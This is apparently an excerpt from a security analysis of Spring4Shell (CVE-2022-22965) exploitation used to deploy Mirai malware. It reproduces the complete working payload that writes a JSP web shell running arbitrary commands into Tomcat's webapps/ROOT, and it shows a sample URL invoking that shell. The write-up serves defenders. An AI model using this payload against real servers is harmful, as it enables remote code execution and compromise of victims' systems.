CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware
The payload from the first stage can be sent as a single request without using different headers as shown in Figure 4 and as described in this public exploit. This exploit proof of concept is also interesting since a legitimate Tomcat feature of formatting the incoming logs to a deployed application is exploited as described in the second stage.
Stage 2
After decoding the payload being used from the first stage, we observe the following parameters and values in the payload:
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if(“j”.equals(request.getParameter(“pwd”))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter(“cmd”)).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
When a server handles this request, it creates a “tomcatwar.jsp” file on the server directory, which can be observed in the following string from the request made in the first stage.
Here, five specific attributes are modified as follows:
1. Pattern: It consists of a formatting layout identifying the various fields to extract from the request and log the response. Here you can see how the headers ‘c2’, ‘c1’, ‘suffix’ are being fetched from the headers. The substitution happens from the incoming headers as the format is %{name_of_header}i.
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if(“j”.equals(request.getParameter(“pwd”))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter(“cmd”)).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i
2. Suffix: The suffix to add to the end of each log file name. The extension of the file that will be written is .jsp
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
3. Directory: The absolute or relative path of a directory where the file will be created. In this case, ‘webapps/ROOT’ is selected since this is the path that is contained in a default Tomcat installation.
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
4. Prefix: The string that is added to the start of each log file that will be created. In this case, it’s ‘tomcatwar’.
class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar
5. fileDateFormat: The field allows for a customized timestamp to be added in the log file name. This is kept empty since we don’t want any other extensions in the JSP webshell and this is set to empty because we don’t desire the default timestamp format.
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
Stage 3
Using the uploaded JSP web shell, malicious actors can execute commands on the server remotely, as observed in this domain:
- · (http://victimIP:8080/tomcatwar[.]jsp?pwd=j&cmd=whoami)
Read More HERE
